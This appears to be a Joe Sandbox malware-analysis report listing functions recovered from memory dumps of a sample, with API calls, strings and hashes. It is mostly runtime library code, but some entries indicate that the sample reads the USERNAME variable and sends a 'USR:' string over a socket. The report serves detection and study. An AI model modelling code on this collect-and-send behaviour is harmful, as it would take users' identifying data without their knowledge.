Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: EnvironmentVariable
String ID: USERNAME
API String ID: 1431749950-1047370299
Opcode ID: 0a5818978904f0c906ba4f82e50d63a31eff666d60d6bbb98090e648aa1b489d
Instruction ID: b3f6c5549a1ff7471dec9b3fe266b9e8b2f03d9401df674ec729959fcc6a26ad
Opcode Fuzzy Hash: 0a5818978904f0c906ba4f82e50d63a31eff666d60d6bbb98090e648aa1b489d
Instruction Fuzzy Hash: FA517832720BA889EB51DB65E844BDD33A5F708BD8F508611FE9927B98DF38C249C740

Function 0000000180002FF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018000305A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00000001800030A2
_Getctype.LIBCPMT ref: 00000001800030BA
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018000314A

Strings

bad locale name, xrefs: 000000018000316D

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2967684691-1405518554
Opcode ID: a3d801a1cfaebbd593bf42ca5d1f081f3bb52a23de257819d605f9cacfaecd5f
Instruction ID: b11802f44764b55c1bfc1b56868af9c264f4e0e674ee54f3c69f6717b1d198e6
Opcode Fuzzy Hash: a3d801a1cfaebbd593bf42ca5d1f081f3bb52a23de257819d605f9cacfaecd5f
Instruction Fuzzy Hash: B4416E32706B4499FB97DFB1D4913ED33A4FB48B88F048024AE4A27A56DF34C65AD344

Function 00007FFE1A512860 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFE1A5128CB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FFE1A512913
_Getctype.LIBCPMT ref: 00007FFE1A51292B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFE1A5129BC

Strings

bad locale name, xrefs: 00007FFE1A5129DF

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2967684691-1405518554
Opcode ID: 294451b330fc8ed514c020a28c9d58de7292f226a1e65688e192973e8b9524f3
Instruction ID: 3b19850be39217c57631839cd53b73120f339337b587c759808842fb5ccdbe0d
Opcode Fuzzy Hash: 294451b330fc8ed514c020a28c9d58de7292f226a1e65688e192973e8b9524f3
Instruction Fuzzy Hash: 11419B62B0DF4199FB14DBB2D0902BC33A1EF91B98F0840B6DE4D22AA5DF38D556D304

Function 0000000180008694 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 0000000180008778
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000883D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008843
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000884F

Strings

USR:, xrefs: 00000001800086B4

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$send
String ID: USR:
API String ID: 3577782087-4260124161
Opcode ID: 29e4c5b1edf0163167a3d518681e02ed4769412421bc44f912ed15b7a6cfd73e
Instruction ID: abfd2f277ed42872bcd22cf9d86f299f6f0423fd668a127f460403bf2eb5ec5d
Opcode Fuzzy Hash: 29e4c5b1edf0163167a3d518681e02ed4769412421bc44f912ed15b7a6cfd73e
Instruction Fuzzy Hash: 4B419372604B8881EB55DB28E4543DE7392FB997D4F90D201E7DC03AEADF78C2889740

Function 0000000180043A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180043A7D
GetLastError.KERNEL32 ref: 0000000180043A93
GetLastError.KERNEL32 ref: 0000000180043B32

Strings

=, xrefs: 0000000180043B14
:, xrefs: 0000000180043B22

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$_invalid_parameter_noinfo
String ID: :$=
API String ID: 2070757136-2134709475
Opcode ID: 9cba9b2686e5e905c4d7bf14db6ed19c826a6f33bed9034c46d7a1af3e028296
Instruction ID: 6abfa04ba87644801f987e1b26dab95be766ed053f9c35c25cd11078a6368e3d
Opcode Fuzzy Hash: 9cba9b2686e5e905c4d7bf14db6ed19c826a6f33bed9034c46d7a1af3e028296
Instruction Fuzzy Hash: E831B532208F8845EBA6AB60A4863EE67A4F74D3DCF469115F6D9026C5DF28C248C789

Function 00007FF6B40A6AD0 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF6B40A6AEE

Part of subcall function 00007FF6B40A2198: HeapFree.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21AE
Part of subcall function 00007FF6B40A2198: _errno.LIBCMT ref: 00007FF6B40A21B8
Part of subcall function 00007FF6B40A2198: GetLastError.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21C0

free.LIBCMT ref: 00007FF6B40A6B00
free.LIBCMT ref: 00007FF6B40A6B12
free.LIBCMT ref: 00007FF6B40A6B24
free.LIBCMT ref: 00007FF6B40A6B36
free.LIBCMT ref: 00007FF6B40A6B48
free.LIBCMT ref: 00007FF6B40A6B5A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 89cb1d98b323f6c38637a9c4813b4509d3cad7a5aae0011a9635bd20c1e0b329
Instruction ID: aad4be52c7a58b41a5db3a4a467b025c48edb397bad5eed0faee83bdce114ce9
Opcode Fuzzy Hash: 89cb1d98b323f6c38637a9c4813b4509d3cad7a5aae0011a9635bd20c1e0b329
Instruction Fuzzy Hash: 91019553A1840391EA54EFADD8E60782361EFE4B44F891835D74ED6692CEACF8C48361

Function 0000000180049B40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180049B5C
GetProcAddress.KERNEL32 ref: 0000000180049B72
FreeLibrary.KERNEL32 ref: 0000000180049B8F

Strings

CorExitProcess, xrefs: 0000000180049B6B
mscoree.dll, xrefs: 0000000180049B53

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 30f87990bc5dacdd22ee8642aedca18c32219fb8470d6f600aa57daa95ec2031
Instruction ID: 909a05e545d87006b4f4772c03f6e728635b2419773c7794a5c6e737b9c08fd0
Opcode Fuzzy Hash: 30f87990bc5dacdd22ee8642aedca18c32219fb8470d6f600aa57daa95ec2031
Instruction Fuzzy Hash: 34F08272312B4982EFD69F50ECD03E82366EB8C7D0F559029B52B4A660CF6CC68CC740

Function 000000018003BD3C Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 000000018003BE5F
__AdjustPointer.LIBCMT ref: 000000018003BEAA

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 95c9924efad8a5ec70471e9321c093c6cd97ba30d405b6775d5b3db0965a3177
Instruction ID: 670f9bf33f6e12ed840263e744b34731133f0a7e4d2469e46da2289f213e0d49
Opcode Fuzzy Hash: 95c9924efad8a5ec70471e9321c093c6cd97ba30d405b6775d5b3db0965a3177
Instruction Fuzzy Hash: 59B1B332206A8C85EAE7DF1595407EB6390AB5DBC8F0BC425BF498B796DF34C64AC701

Function 00007FFE1A5122D0 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFE1A5124E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A512561
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A512567
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A512573
__std_exception_destroy.LIBVCRUNTIME ref: 00007FFE1A51259D

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
String ID:
API String ID: 1087005451-0
Opcode ID: a93628aef15acca85d184073870887a4e22955e09458b6074a71e885399ed3c5
Instruction ID: 032c79d7490c7ee97ad2b6e6dbbef75fe154058db76cb1c981217f1e3fac1dff
Opcode Fuzzy Hash: a93628aef15acca85d184073870887a4e22955e09458b6074a71e885399ed3c5
Instruction Fuzzy Hash: 4A81AA62F1DF4185FB10CB66E4403FC2362AB56BA8F5086B6DE5C16BE6DE38A195C340

Function 00007FF6B40A4708 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 00007FF6B40A472D

Part of subcall function 00007FF6B40A6790: Sleep.KERNEL32(?,?,0000000A,00007FF6B40A2FB3,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A67D5

GetFileType.KERNEL32 ref: 00007FF6B40A48AA

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: 3b749aade11e6e4c7cb77615084bc82aeb7c2d6ab51471f22d2460a85492b6b0
Instruction ID: 357734a1446c4d1900fed777cb47bf950d3a32f3cba928c01822b114c27709af
Opcode Fuzzy Hash: 3b749aade11e6e4c7cb77615084bc82aeb7c2d6ab51471f22d2460a85492b6b0
Instruction Fuzzy Hash: 22914A26A186A281E750CF2C948866D26A9FF05774F658735CB7D873E1DF3CE892C312

Function 000000018004E29C Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000018004E2D8
_set_statfp.LIBCMT ref: 000000018004E2F6
_set_statfp.LIBCMT ref: 000000018004E31F
_set_statfp.LIBCMT ref: 000000018004E4D8

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 905523d5ca8ba9e9c853f659dfa0687955829a9fd993b3c664cd6a3c312b3196
Instruction ID: 0ff48dba38e39858f50f945cb10bceec7ec20ac082745d2e677fbc8ffc6a4f7c
Opcode Fuzzy Hash: 905523d5ca8ba9e9c853f659dfa0687955829a9fd993b3c664cd6a3c312b3196
Instruction Fuzzy Hash: 6A51E632500ECC86F6A39F3898943EA6361BB8B3DCF16C615B956276D5DF3487C98704

Function 00000001800383C0 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000000180038447
MultiByteToWideChar.KERNEL32 ref: 00000001800384C9
SysAllocString.OLEAUT32 ref: 00000001800384D6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 62714a8e92ac2e3768de6dcb3cf362934baa0e9811f4db2cd90f20c263988412
Instruction ID: 469c3476610afd63b9dda2b2500542d548a23ae1f2720cb4f8c5b10bcf90d71c
Opcode Fuzzy Hash: 62714a8e92ac2e3768de6dcb3cf362934baa0e9811f4db2cd90f20c263988412
Instruction Fuzzy Hash: 70419672200B8C89EB979F7598503EA2391FB4CBE4F15C664BA6947BD5DF38C2499300

Function 00007FFE1A516430 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFE1A51645B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFE1A516480
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFE1A5164AA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFE1A51653B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A516563

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 6318df3083579dbf7b6285f833c229f00b0ee58f2054d6ba7d31072e1c74ff69
Instruction ID: e233c7d0d61c053539e6f1b03a28b479c0d495aae2b0a3cc15b2140548728a67
Opcode Fuzzy Hash: 6318df3083579dbf7b6285f833c229f00b0ee58f2054d6ba7d31072e1c74ff69
Instruction Fuzzy Hash: 29313022B0CE4285EA25DB17E94027977A1EB56FB8F5801F7DA8D07AB5EE3CE441C710

Function 00007FF6B40A7158 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE,?,?,?,00007FF6B40A1AF1), ref: 00007FF6B40A7181
DecodePointer.KERNEL32(?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE,?,?,?,00007FF6B40A1AF1), ref: 00007FF6B40A7190

Part of subcall function 00007FF6B40A955C: _errno.LIBCMT ref: 00007FF6B40A9565

EncodePointer.KERNEL32(?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE,?,?,?,00007FF6B40A1AF1), ref: 00007FF6B40A720D

Part of subcall function 00007FF6B40A6814: realloc.LIBCMT ref: 00007FF6B40A683F
Part of subcall function 00007FF6B40A6814: Sleep.KERNEL32(?,?,00000000,00007FF6B40A71FD,?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE), ref: 00007FF6B40A685B

EncodePointer.KERNEL32(?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE,?,?,?,00007FF6B40A1AF1), ref: 00007FF6B40A721C
EncodePointer.KERNEL32(?,?,?,00007FF6B40A7269,?,?,?,?,00007FF6B40A39EE,?,?,?,00007FF6B40A1AF1), ref: 00007FF6B40A7228

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: 0e074153eb9d63f2c17b9402fb3d1a40f0e27b5d40e28b708fe33e4ca726acdd
Instruction ID: 99f22f817b915a19a63e7a4854b4ab6d5c247d2c1026dfb9b52a0b39b367fef2
Opcode Fuzzy Hash: 0e074153eb9d63f2c17b9402fb3d1a40f0e27b5d40e28b708fe33e4ca726acdd
Instruction Fuzzy Hash: 9F219821B0964740E900EF6EE5C8079B391BF45BC4F448835EB8D9B786DE7CE4828345

Function 000000018005D570 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000018005D598
_set_statfp.LIBCMT ref: 000000018005D5B3
_set_statfp.LIBCMT ref: 000000018005D5CF
_set_statfp.LIBCMT ref: 000000018005D60B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
Instruction ID: 2afb7397f3ae8c377ebb41b4e8519b687f2fb5d13a362394e4a26be0e9ffa761
Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
Instruction Fuzzy Hash: 52110D72910E4D41FAF71224D4823E91140679D3F8F45C63375672A2D6EF258BCD4704

Function 00007FFE1A531D3C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE1A531D64
_set_statfp.LIBCMT ref: 00007FFE1A531D7F
_set_statfp.LIBCMT ref: 00007FFE1A531D9B
_set_statfp.LIBCMT ref: 00007FFE1A531DD7

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 597d5b4aee7d64b9050df70b15814e8fa5bde9f495df4b3dc80ab098d1285053
Instruction ID: 60b6aa7230f4090fd73e2979044fa67fbb218c1d2e30cc48a378efc9466a1f47
Opcode Fuzzy Hash: 597d5b4aee7d64b9050df70b15814e8fa5bde9f495df4b3dc80ab098d1285053
Instruction Fuzzy Hash: C7112162F1CF0341FB6451BAD55637A21A27FD7B70F580EF7E96E066FA8E1CA8414200

Function 00007FFE1A523784 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE1A51EA93,?,?,00000000,00007FFE1A51ED2E,?,?,?,?,?,00007FFE1A51ECBA), ref: 00007FFE1A5237A3
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51EA93,?,?,00000000,00007FFE1A51ED2E,?,?,?,?,?,00007FFE1A51ECBA), ref: 00007FFE1A5237C2
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51EA93,?,?,00000000,00007FFE1A51ED2E,?,?,?,?,?,00007FFE1A51ECBA), ref: 00007FFE1A5237EA
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51EA93,?,?,00000000,00007FFE1A51ED2E,?,?,?,?,?,00007FFE1A51ECBA), ref: 00007FFE1A5237FB
FlsSetValue.KERNEL32(?,?,?,00007FFE1A51EA93,?,?,00000000,00007FFE1A51ED2E,?,?,?,?,?,00007FFE1A51ECBA), ref: 00007FFE1A52380C

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 0352d9418066cc347edcd07b6d192514647ef19ae0527dbd8c67cf215ad69dd2
Instruction ID: b6019463e7ae621927fd14812dd1ad870d04595544a9c44e223d4dc43263d1cd
Opcode Fuzzy Hash: 0352d9418066cc347edcd07b6d192514647ef19ae0527dbd8c67cf215ad69dd2
Instruction Fuzzy Hash: 6D113D24F0DA4282FA5997E7655117961A36F46FB0F5843F7E93E1A7F7EE2CA4018200

Function 0000000180041718 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180041750
_invalid_parameter_noinfo.LIBCMT ref: 0000000180041904

Strings

25-11 C1, xrefs: 000000018004172F

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
